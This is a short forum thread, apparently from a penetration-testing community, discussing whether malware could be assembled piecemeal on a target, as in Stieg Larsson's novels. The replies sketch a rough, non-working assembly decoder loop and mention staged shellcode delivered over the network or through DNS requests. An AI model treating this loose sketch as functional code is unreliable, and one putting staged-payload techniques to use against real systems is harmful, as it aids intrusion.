Results 1 to 4 of 4

Thread: stieg larsson's asphyxia

  1. #1
    Join Date
    Nov 2008

    Default stieg larsson's asphyxia

    In the millennium series by stieg larsson, a talented pc user named WASP designs and implements an app named asphyxia. The interesting part is how the app is constructed on the remote machine by the concatenation of individual payloads. Is this possible in reality? All my knowledge in pentesting is rather limited to standard approaches. Installing a vulnerability is based on the delivery of an intact piece of code that can execute or a single event.

    The concept of piecemeal delivery of code that is assembled remotely on the target machine seems to be a devilishly difficult exploit to guard against. How would an antivirus or malware scanning app know about code fragments?

    Getting back to the point though-does anyone have insight into this idea?

  2. #2
    Good friend of the forums
    Join Date
    Jun 2008

    Default Re: stieg larsson's asphyxia

    Not shore of the names it would use but something like that is, eg
    12345678 = inc eax
    45678912 = push esp
    say the above is commands in the program or a dll if you know the address were they are, rather than have the opcodes for "inc eax", you can pass 12345678, the same can work for functions, like strcpy,socket etc

    eg decoder

    esi = payload address
    edi = temp storage on r/w/e
    mov ecx , esp;
    sub ecx , esi;
    mov eax , [esi];
    mov ebx, [eax];
    mov [edi],ebx;
    inc esi;
    inc edi;
    cmp ecx,esi;
    jz = to top;

    another way could be to just fork to child shellcode payloads that get sent once a small network payload is sent, like what metaperter does, if you run a pluging it sends the shellcode and runns it.

  3. #3
    Super Moderator lupin's Avatar
    Join Date
    Jan 2010

    Default Re: stieg larsson's asphyxia

    First of all, meaningful thread names. Second, you need to sort out your use of terminology. An attacker doesnt install a vulnerability, and piecemeal delivery of code isn't an exploit, at least not in and of itself, although it could be considered to be a technique for executing code after an exploit has been used to take control of code execution on a system.

    Is the technique possible? Yes, and its currently being used. If you want to see an example of a simple use of this have a look at the DNS tunneling shellcode from ProjectShellcode. There is a paper by Ty Miller that explains how it retrieves second stage shellcode over DNS requests.
    Capitalisation is important. It's the difference between "Helping your brother Jack off a horse" and "Helping your brother jack off a horse".

    The Forum Rules, Forum FAQ and the BackTrack Wiki... learn them, love them, live them.

  4. #4
    Join Date
    Mar 2007

    Default Re: stieg larsson's asphyxia

    This thread has nothing to do with backtrack

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts